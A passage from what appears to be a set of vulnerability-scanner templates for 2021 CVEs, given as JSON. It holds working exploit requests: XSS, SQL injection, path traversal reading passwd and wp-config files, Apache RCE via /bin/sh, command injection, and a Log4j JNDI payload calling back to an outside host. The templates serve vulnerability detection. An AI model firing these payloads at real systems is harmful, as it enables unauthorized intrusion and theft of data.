{{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6- SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery 